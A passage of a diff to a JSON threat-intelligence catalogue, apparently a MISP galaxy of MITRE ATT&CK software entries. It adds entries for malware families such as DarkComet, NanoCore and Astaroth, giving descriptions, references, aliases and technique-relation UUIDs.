"56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22784,26 +25544,12 @@ ], "type": "uses" }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "c541efb4-e7b1-4ad6-9da8-b4e113f5dd42", @@ -22833,14 +25579,14 @@ "type": "uses" }, { - "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22876,7 +25622,2878 @@ ], "uuid": "23040c15-e7d8-47b5-8c16-8fd3e0e297fe", "value": "NotCompatible - S0299" + }, + { + "description": "[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)", + "meta": { + "external_id": "S0333", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0333", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/" + ], + "synonyms": [ + "UBoatRAT" + ] + }, + "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f", + "value": "UBoatRAT - S0333" + }, + { + "description": "[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)", + "meta": { + "external_id": "S0334", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0334", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + ], + "synonyms": [ + "DarkComet", + "DarkKomet", + "Fynloski", + "Krademok", + "FYNLOS" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "value": "DarkComet - S0334" + }, + { + "description": "[Exaramel](https://attack.mitre.org/software/S0343) is multi-platform backdoor for Linux and Windows 
systems.(Citation: ESET TeleBots Oct 2018)", + "meta": { + "external_id": "S0343", + "mitre_platforms": [ + "Linux", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0343", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + ], + "synonyms": [ + "Exaramel" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + 
"uuid": "051eaca1-958f-4091-9e5f-a9acd8f820b5", + "value": "Exaramel - S0343" + }, + { + "description": "[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)", + "meta": { + "external_id": "S0335", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0335", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" + ], + "synonyms": [ + "Carbon" + ] + }, + "related": [ + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "value": "Carbon - S0335" + }, + { + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. 
[NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "meta": { + "external_id": "S0353", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0353", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "NOKKI" + ] + }, + "related": [ + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "value": "NOKKI - S0353" + }, + { + "description": "[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. 
It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)", + "meta": { + "external_id": "S0336", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0336", + "https://www.digitrustgroup.com/nanocore-not-your-average-rat/", + "https://cofense.com/nanocore-rat-resurfaced-sewers/", + "https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ], + "synonyms": [ + "NanoCore" + ] + }, + "related": [ + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "value": "NanoCore - S0336" + }, + { + "description": "[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe and Brazil. It has been known publicly since at least late 2017. 
(Citation: Cybereason Astaroth Feb 2019) (Citation: Cofense Astaroth Sept 2018)", + "meta": { + "external_id": "S0373", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0373", + "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", + "https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/" + ], + "synonyms": [ + "Astaroth" + ] + }, + "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "edb24a93-1f7a-4bbf-a738-1397a14662c6", + "value": "Astaroth - S0373" + }, + { + "description": "[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)", + "meta": { + "external_id": "S0337", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0337", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" + ], + "synonyms": [ + "BadPatch" + ] + }, + "related": [ + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", 
+ "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "9af05de0-bc09-4511-a350-5eb8b06185c1", + "value": "BadPatch - S0337" + }, + { + "description": "[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)", + "meta": { + "external_id": "S0339", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0339", + "https://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://blog.radware.com/security/2018/07/micropsia-malware/" + ], + "synonyms": [ + "Micropsia" + ] + }, + "related": [ + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], 